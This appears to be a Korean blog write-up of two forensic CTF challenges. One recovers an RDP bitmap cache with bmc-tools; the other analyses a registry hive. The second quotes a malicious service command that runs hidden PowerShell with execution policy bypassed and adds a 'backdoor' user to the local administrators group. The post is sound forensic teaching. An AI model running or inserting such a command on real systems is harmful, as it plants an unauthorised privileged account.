[Forensic] watch

https://github.com/ANSSI-FR/bmc-tools

BMC Tools 를 다운로드받는다.

 문제파일을 확인하면 bcache24.bmc 와 Cache0000.bin을 확인할 수 있다.

Bmc-tools를 각 파일에 적용시켜준다.

python bmc-tools.py -s "C:\Users\[사용자]\Downloads\RDP\rdp\cache0000.bin" -d "C:\Users\[사용자]\Downloads\RDP\rdp\


output_cache" -o 를 실행하자, 1936개의 bmp 파일들이 생성된 것을 볼 수 있다.

더 쉬운 풀이를 위해, 콜라주 옵션을 사용해준다.

python bmc-tools.py -s "C:\Users\김서연\Downloads\RDP\rdp\cache0000.bin" -d "C:\Users\김서연\Downloads\RDP\rdp\output_cache" -o -b

생성된 collage bitmap에서 flag를 확인할 수 있다.

Flag: s0m3on3_1s_w4tch1n9_my_pc

[Forensic] Shadow of the System

레지스트리의 헤더에서 regf라는 특성을 확인 가능하다. RegistrySpy를 이용해 파일을 분석하면, 이미지와 같이 수상한 서비스를 찾을 수 있다.

해당 ImagePath를 확인하면 다음과 같은 커맨드이다.

C:\Windows\System32\cmd.exe /c powershell.exe -Exec Bypass -WindowStyle Hidden -Command "ping -n 5 127.0.0.1 > nul; net user /add backdoor P@ss123!; net localgroup administrators backdoor /add; echo '{8yp455_u4c_g37_5y5t3m}' > C:\temp\success.log"

 Flag: 8yp455_u4c_g37_5y5t3m

해당 CTF의 내가 푼 문제 이외의 풀이는 Hspace Tech Blog에서 확인할 수 있다.

우리팀은 예선 4위로 본선에 진출했다.

+) 본선날 팀원 모두가 급작스런 개인사정이 생겨서 본선에는 불참하게 되었다. 아쉽다.